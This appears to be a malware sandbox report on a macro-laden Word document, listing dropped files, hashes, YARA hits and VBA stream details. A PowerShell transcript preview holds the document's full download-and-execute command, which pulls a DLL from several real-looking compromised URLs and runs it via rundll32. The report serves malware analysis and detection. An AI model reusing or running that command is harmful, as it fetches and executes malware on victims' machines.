Preview:	.PNG........IHDR...g.........&.......sRGB.........IDATx^..`....^..K.,[.w..tB..Hh.B......B.IH.4z3....1.\q..z?..m...=.d.P....".........7...]g..!I...`.o.@.. .D...."@.... .D`.%`.......]......T.1.4.A..@8.\|....."@.... .D...."...0...".'.CS...7.......jn..TM..~(..!........."@.... .D....".....0.C.$..y.....(^..IK.z...VM.&...G:.) .AV5v...!...`.."H.`.....C.'.%.3w--..>.I..."@.... .D...."..#..R.d..&L[3...5.zj.{/...5..u.C...; .P,.xY.T.4%=...!:$.)..)..#..[>..F.zD.... .D...."@........D.k.0v......t3..w..66.+.d........+....K.....G.=,H.Ur..x..2E. ...O"...:.g.Le...;...O..qw....n...$...."@.... .D.....J #B.\|M.qS.M<..5......j.e.O.!vL.qa.)D.$).d.."...v..{....:..,.vy.._.k...:#...&........2.p>^,.g.b...a7....C...N....+..ke.g&#.r...Q)D...."@.... .D...+..U.....'.f..P5..=[#q.a.G...W.VF.Y.e..e=.km......]2.7rh.C..u...d.Ru..;c.;.V....*..:^]..5CQ.W....&..$..\|.J2.....V4{.U..i....py.t.....,.....+..U.r+..0..R\.s....NB..$#.....~....R".....k..{.... .D....".W.dD.q.1m..-......E4<t..}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	4.791632956671569
Encrypted:	false
SSDEEP:	768:Pc/plLQxx12HtK6z0DcB/plLQxx12HtK6z0D:6lLQxx12HtK6z0YlLQxx12HtK6z0
MD5:	F891379A1806E6A11733C87FB30DB025
SHA1:	553685217C2A08B1B56E59A749A9FB2CEF696A35
SHA-256:	752CAC548A161A64B01DC200B4810A2308DC4B8B73AC9CA0454855056E6B73F7
SHA-512:	9C4B1B49D637214E8F0EC62D3933B04B0CF474DE7C6BE7F8F06AE0A9D05A2C6CA2C4BC7417E3BACC24F2D6341E3F5C332871469FD501802944136F92B89C42F7
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{521AB53C-1F2D-413C-8011-B893289A85E3}.tmp Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:X:X
MD5:	32649384730B2D61C9E79D46DE589115
SHA1:	053D8D6CEEBA9453C97D0EE5374DB863E6F77AD4
SHA-256:	E545D395BB3FD971F91BF9A2B6722831DF704EFAE6C1AA9DA0989ED0970B77BB
SHA-512:	A4944ADFCB670ECD1A320FF126E7DBC7FC8CC4D5E73696D43C404E1C9BB5F228CF8A6EC1E9B1820709AD6D4D28093B7020B1B2578FDBC764287F86F888C07D9C
Malicious:	false
Preview:	..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{9EE2F9D3-844A-448C-93FB-84314B295DC1}.tmp Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.6413622548786062
Encrypted:	false
SSDEEP:	6:rlEPgsn1F1YsuTyavlEtSYd9XwY2sQmh5epe8P+7WAeSTBFXZSuIehx:ePLF10yWEtSYW9oH8JAeOBBZSmX
MD5:	91473136D20E3046BECA18C78CE9BBE7
SHA1:	014B29FADC9F1EB72ADEBAB7A157BF9789953462
SHA-256:	7A57B63B9EB2FA46EC6C49F9D792DE64710966EA99730E6B18702F49D988A15F
SHA-512:	4ABA8620775E931315BAE02D9F3C72188413831342C1BC67EC1F5C0FD37D0F662ABD04EBED5D3613CB8BAC159B87457BB87FCF4E6992262ABE4981B95EAAE5A0
Malicious:	false
Preview:	../........... . . ... ... ..... . ..... . ... ......... . . ......... ........... . . ....... ... ... . ...........................................................................................................................................................................................................................................................................................................................................................................................................................................6...8...B...D...F...J...L...l...n...p...r...t...v...x...z...\|.......................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{C4306DA8-3134-42DC-857A-E2C8FA5CD236}.tmp Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8003
Entropy (8bit):	4.839308921501875
Encrypted:	false
SSDEEP:	192:yxoe5oVsm5emdVVFn3eGOVpN6K3bkkjo59gkjDt4iWN3yBGHh9smidcU6CXpOTik:DBVoGIpN6KQkj2Wkjh4iUx0mib4J
MD5:	937C6E940577634844311E349BD4614D
SHA1:	379440E933201CD3E6E6BF9B0E61B7663693195F
SHA-256:	30DC628AB2979D2CF0D281E998077E5721C68B9BBA61610039E11FDC438B993C
SHA-512:	6B37FE533991631C8290A0E9CC0B4F11A79828616BEF0233B4C57EC7C9DCBFC274FB7E50FC920C4312C93E74CE621B6779F10E4016E9FD794961696074BDFBFA
Malicious:	false
Preview:	PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	20488
Entropy (8bit):	5.6072334934969135
Encrypted:	false
SSDEEP:	384:Tt9FWX0lAPJWQOLvh4KnKudcUSjulpEIij9nSrz3GQ1evrfMza:/aObh4KKuuUSClm967daf
MD5:	402FBE97FF53FDDFCC16C3CDDAC78C6E
SHA1:	1BA91D5F4D6D7C813B536BD40AFEA20A363CD8E3
SHA-256:	5660CB335217D3ADB7B7321855F49AC2C6F4DC3CF4477DEF5A043111403075A0
SHA-512:	AB1CA7CF7A198BE9E05754F3B2DE3F80A329447D8D16A0F613772B60FE04BB27894654E0E91EBB8299B6E4DA65D6228C3806221DFB96773692EA7D04A736B7A5
Malicious:	false
Preview:	@...e...................h...............*.G..........@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].E.....%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	152056
Entropy (8bit):	4.414433482333769
Encrypted:	false
SSDEEP:	1536:fmmk/zolWWpFpKKHAeedydju4HTbTuo+o5aQxJudUl9yhQL3ow:fC88WpFpKKHHedydFeo+oQLUlPow
MD5:	3D6C80467F22055400A5B30D4DD9598D
SHA1:	1172A3029D2657F4581F5A886290AA31B559EEA7
SHA-256:	F2E88E2537FEC66D4F3EBD4450F6C8207E439C8526B049F8CA6501481F911A11
SHA-512:	0529E1BC35882AEC691C6E0FC84FB63B7F0F1EE53CA8D76AED236BAE9392EA2E6BDB36594CD5530F868B6E5C4DD3A64B2AA12BEEFDCEB887F20F3A79F271A36E
Malicious:	false
Preview:	MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........\|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0......*..\+...+..$,...,...,..P-...-......\|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8...8...9..l9...9..4:...:...:..`;...;..(<...<...<..T=...=...>...>...>..H?...?...@..t@...@..<A...A...B..hB.......B...........^...............g...............W...............F..............<G...............g...............i...I..............T..................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ivljvnov.dnx.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rjtsltui.gs0.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\~DFE2F261E3909AA4D4.TMP Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	5.018582507630294
Encrypted:	false
SSDEEP:	768:rkax/vHMetK6nYmBvtCnXZs7Dq0y5BU50uIxMH:lx3HMuK6Ym/Cnps39qU5pI
MD5:	D371FE31D4F951D5BD8A57F7072AA424
SHA1:	50EA1D2D815EC7B071B4A3388CFA4229928D942A
SHA-256:	12342D67B505C694831D87F4F3A742987C3DE00565E1DC0354D3951FBFF7E918
SHA-512:	49FF822E23896CD68BECC10BD4B3BAC2D4511F0B1852D768CE4496ED154E26025C06A84D7A4526A9770F9FA437CF1463C271887927FCDE705FDDF7CCBBF623F2
Malicious:	false
Yara Hits:	Rule: SUSP_VBA_FileSystem_Access, Description: Detects suspicious VBA that writes to disk and is activated on document open, Source: C:\Users\user\AppData\Local\Temp\~DFE2F261E3909AA4D4.TMP, Author: Florian Roth
Preview:	......................>...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................6....................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...........T...8...E...:...C...<...=...>...?...@...A...B...5...D.......F...]...H...I...J...K...L...M...N...9...P...Q...R...S...........V...W...X...Y...Z...[...\...O...^...................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\1711.LNK Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 13:47:09 2020, mtime=Mon Nov 22 18:01:14 2021, atime=Mon Nov 22 18:01:11 2021, length=135948, window=hide
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.700737445312133
Encrypted:	false
SSDEEP:	12:8MkC0Uk6CHiXO6gGXb2D6U+Wk4T8A7R5DjAf/yxZ4nDySGM4t2Y+xIBjKZm:8LorYY4T8AF5HAfKxZYDyY7aB6m
MD5:	9C0FA7A9D0CE752EE3B4F30AFB49BA47
SHA1:	B964316B0F8C8D20AAF8CCB4C670893CC2B0880D
SHA-256:	DADE1806B80DE63CEBCF92FF6DBBB983F7C094AC08E9047B20E7FA41EF960F0E
SHA-512:	4F3F54B39C246303F38D8A0D3D368F07433178A3FC2838187486F52EB7786AC91E6303BEC80865A23D6E70AED71909DC3A3F34655CCDDB00F2D033A8CFFEA128
Malicious:	false
Preview:	L..................F.... ......8......R.......P.................................P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L..vS......................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....>Q.u..user..>.......NM.vS.......S.....................xf.a.l.f.o.n.s.....~.1.....>Q.u..Desktop.h.......NM.vS.......Y..............>.......&.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....Z.2.....vS&. .1711.doc..B......>Q.uvS&.....f......................Iu.1.7.1.1...d.o.c.......O...............-.......N...........>.S......C:\Users\user\Desktop\1711.doc........\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.1.7.1.1...d.o.c.........:..,.LB.)...Aw...`.......X.......813435...........!a..%.H.VZAj...\|Yt.+........W...!a..%.H.VZAj...\|Yt.+........W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H.....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	59
Entropy (8bit):	4.424791041423791
Encrypted:	false
SSDEEP:	3:bDuMJlYUdruYCmX1USXruYCv:bCs2Ms
MD5:	38B1B69A7D2D3E1C386BC4E37CB0A52B
SHA1:	F761BA2E5930369A2AE6B055664B1E06E53E3646
SHA-256:	EE6611A14ABADA654761586768A652637235A616AF1030FD8BC52EA555FFF18C
SHA-512:	CA698A65875D0DBAFBA21E6384ED97672BCFDBA0C20BA92EFF147139B938412D393C14A6F46C6BE13AC2F4DD0314F57C7BDF7DF76544D4269207234AA3874FFF
Malicious:	false
Preview:	[folders]..Templates.LNK=0..1711.LNK=0..[doc]..1711.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	3.2383484540671748
Encrypted:	false
SSDEEP:	3:Rl/ZdPul13CDlqzJAgP9Dr8Kn:RtZNufCQigP9P8Kn
MD5:	46F4823949A556BFEA5B765EBD42BB64
SHA1:	BA9BDFC155426C1D1EA12E43BF94B6BB0EF6C3F0
SHA-256:	6D360F9F02CE1A909EE4C4329105282430A97C95A91943A8303AD19BD6E3F2A2
SHA-512:	9DA76343D00276409C3B545BE642E4F1E7B74B6545A941DE08C15D900E18F5B63E981BF38C606DED67CCA53F9F1D7A50EBA656A59B2280E2A634CC581621B461
Malicious:	false
Preview:	.pratesh................................................p.r.a.t.e.s.h.........{67&.............................6+&.....^.j@..jT..j`..jDB.jZR.js6/&................

C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	Little-endian UTF-16 Unicode text, with CR line terminators
Category:	dropped
Size (bytes):	20
Entropy (8bit):	2.8954618442383215
Encrypted:	false
SSDEEP:	3:QVNliGn:Q9rn
MD5:	C4F79900719F08A6F11287E3C7991493
SHA1:	754325A769BE6ECCC664002CD8F6BDB0D0B8CA4D
SHA-256:	625CA96CCA65A363CC76429804FF47520B103D2044BA559B11EB02AB7B4D79A8
SHA-512:	0F3C498BC7680B4C9167F790CC0BE6C889354AF703ABF0547F87B78FEB0BAA9F5220691DF511192B36AD9F3F69E547E6D382833E6BC25CDB4CD2191920970C5F
Malicious:	false
Preview:	..p.r.a.t.e.s.h.....

C:\Users\user\Desktop\~$1711.doc Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	3.2383484540671748
Encrypted:	false
SSDEEP:	3:Rl/ZdPul13CDlqzJAgP9Dr8Kn:RtZNufCQigP9P8Kn
MD5:	46F4823949A556BFEA5B765EBD42BB64
SHA1:	BA9BDFC155426C1D1EA12E43BF94B6BB0EF6C3F0
SHA-256:	6D360F9F02CE1A909EE4C4329105282430A97C95A91943A8303AD19BD6E3F2A2
SHA-512:	9DA76343D00276409C3B545BE642E4F1E7B74B6545A941DE08C15D900E18F5B63E981BF38C606DED67CCA53F9F1D7A50EBA656A59B2280E2A634CC581621B461
Malicious:	true
Preview:	.pratesh................................................p.r.a.t.e.s.h.........{67&.............................6+&.....^.j@..jT..j`..jDB.jZR.js6/&................

C:\Users\user\Documents\20211122\PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	8809
Entropy (8bit):	5.5691522866908825
Encrypted:	false
SSDEEP:	96:BZn/SNJG0CKGYS+x1qDo1ZEG0CKGYS+xPqeZJ/SNJG0CKGYS+x1qDo1ZUgbAEbTN:p0C20CG0Ca//oQ/0CGd0jS0jSYjD
MD5:	CE9C3E936CA194A99E6527EB5E631358
SHA1:	208B7F23A6F20232174437F051EE1C94FD2E196A
SHA-256:	A452D65B472CB605519456B0DC34426B1E9868B82E1BECF69067D40005A92821
SHA-512:	06C9DBC47E2535CD3AF441617A1D4F38E7177508E2E295D893EDE86A5B0C820C1BEEC66BEC9FE6C8565A713C55370211B7AC2498E6D81674275438D81AFFF41F
Malicious:	false
Preview:	.**********************..Windows PowerShell transcript start..Start time: 20211122110132..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 813435 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell $dfkj=$strs="http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/".Split(",");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth="C:\ProgramData\"+$r1+".dll";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp="C:\Windows\SysWow64\rundll32.exe";$a=$tpth+",f"+$r2;Start-Process $fp -ArgumentList $a;break;}};;IEX $dfkj..Process ID: 6468..PSVersion: 5.1.17134.1..PSEdition: Des

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log Download File
Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	7250
Entropy (8bit):	3.1679989221091893
Encrypted:	false
SSDEEP:	96:cEj+AbCEH+AbuEAc+AbhGEA+AbNEe+Ab/Ee+AbPE6w9+Ab1wTEz+AbG:cY+38+DJc+iGr+MZ+65+6tg+ECo+z
MD5:	D0F6C98FB282DF59111DB522D6E9108B
SHA1:	809FA55C7EB553FB09B8035DB2A92EDB60B799E8
SHA-256:	6FDC668D8B86845B76461C63DA8F7DBB10204D557D9F46A36D14855A6CFC4B9F
SHA-512:	D7577FFA762E8A867E009E4D3BE5923CF2A30D995F96B3DB023DDD32570D0AF41B014B23B0C8C4C05C62C539BC4C8FD4FF83BF8DEAD046E25E498BE7BB7C8B10
Malicious:	false
Preview:	..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20211122_190130_406.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	3.3934816676816406
Encrypted:	false
SSDEEP:	96:dCD/o+QK5Xu932YgEmCAvI2lESkDP4flT2mYFzuUMCNrJRrl52:0LOmY723uIC/8
MD5:	83F6606FCBD342F5D823A014F0F2702F
SHA1:	5A8E3060F13E0D7F9DD148B3199F486B5F79EEA9
SHA-256:	F9807DBCF7698CA1DECCEA377A9794482E46F0A95D1300DBC56262F9221894BB
SHA-512:	05DEFA64EAB3DE871B8EADC53E7BEB33B993118EAF0860817D8296B992C4B95197DD1B8BC84AE62FFE5241DE5EFC6EAB33BA8AC8E6D2486E28F2F6446E50A9C1
Malicious:	false
Preview:	.... ... ....................................... ...!...............................\|............................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................./_8..... ......'.[............8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.1.1.1.2.2._.1.9.0.1.3.0._.4.0.6...e.t.l.........P.P.....\|...........................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk (copy) Download File
Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	485376
Entropy (8bit):	7.178849265977026
Encrypted:	false
SSDEEP:	12288:bdv8jkvzqZvv2wLB4mTi12yD88kYwZ1h1:b2Zvv2cTTi1v0Z1h
MD5:	6ED0F0B0046573CFBA56C98152B44F28
SHA1:	53FC583339C441DFFBFCF2C2F1F660C1CAD96714
SHA-256:	A84F4C76EF86D165088979CB91506B65C3D84CB92386E3AA68EABA4EFE0C9B5E
SHA-512:	5DEF2C24FBA65FB8CADE6954609F29DDC175DB1FD1A797BEFF68C2FCDA44E8E7E751294498806191120807EBC07948CA4EE9F23DE402959CD0EE9DD4FF263AEA
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 34%, Browse Antivirus: ReversingLabs, Detection: 81%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................................................PE..L....L.a...........!................&X....................................................@.......................................... ...D...................p...3......................................@............................................text............................... ..`.rdata...<.......>..................@..@.data...,%..........................@....rsrc....D... ...F..................@..@.reloc...3...p...4...4..............@..B................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	Microsoft Word 2007+
Entropy (8bit):	7.953932715889731
TrID:	Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99% Word Microsoft Office Open XML Format document (49504/1) 32.35% Word Microsoft Office Open XML Format document (43504/1) 28.43% ZIP compressed archive (8000/1) 5.23%
File name:	1711.doc
File size:	145337
MD5:	85ab297345c97bca1a5004dc537f6c1c
SHA1:	0b609d0b86f1b29410451306c173c7fac013d5a7
SHA256:	31daa06dc4c4f5dda5e557e8422d9b31655b1322e610bb42096a2a060727927d
SHA512:	c5f246b510db5ba25b29338a5fc1182ac56738be51ebc6c8f5fb0e004a5b42e61fe69a304efcd5e000382609f1f524f329bd41322b5e5f67a986deea40cd4ec6
SSDEEP:	3072:hwQhXwhJd0+y7ukYe4uYum1GdgOpVXGuhCUqDK3CXV:yeXw50+OukzVXV2uhDCxXV
File Content Preview:	PK..........!.................[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	74f4c4c6c1cac4d8

Static OLE Info

General
Document Type:	OpenXML
Number of OLE Files:	1

OLE File "/opt/package/joesandbox/database/analysis/526179/sample/1711.doc"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	False
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Author:	1
Template:	Normal.dotm
Last Saved By:	1
Revion Number:	39
Total Edit Time:	144
Create Time:	2021-11-15T15:39:00Z
Last Saved Time:	2021-11-16T19:13:00Z
Number of Pages:	1
Number of Words:	9
Number of Characters:	53
Creating Application:	Microsoft Office Word
Security:	0

Document Summary
Number of Lines:	1
Number of Paragraphs:	1
Thumbnail Scaling Desired:	false
Company:
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	12.0000

Streams with VBA

VBA File Name: bvkaeiku2ncoi2uho3ihdes.cls, Stream Size: 9859

General
